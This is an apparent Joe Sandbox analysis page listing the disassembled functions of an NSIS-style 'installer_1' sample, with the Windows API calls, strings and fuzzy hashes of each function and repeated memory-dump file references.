Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

N, xrefs: 00404C06
M, xrefs: 00404B43
, xrefs: 00404F39
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
@%F, xrefs: 00404674
82D, xrefs: 004046DB
A, xrefs: 00404636

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile("%s"), xrefs: 00406DBC
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Kernel32.DLL, xrefs: 0040659B
Module32NextW, xrefs: 004065DE
Process32NextW, xrefs: 004065C8
CreateToolhelp32Snapshot, xrefs: 004065B5
GetModuleBaseNameW, xrefs: 00406494
Unknown, xrefs: 004064FC
EnumProcesses, xrefs: 00406482
Process32FirstW, xrefs: 004065BD
Module32FirstW, xrefs: 004065D3
EnumProcessModules, xrefs: 0040648A
PSAPI.DLL, xrefs: 00406464

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
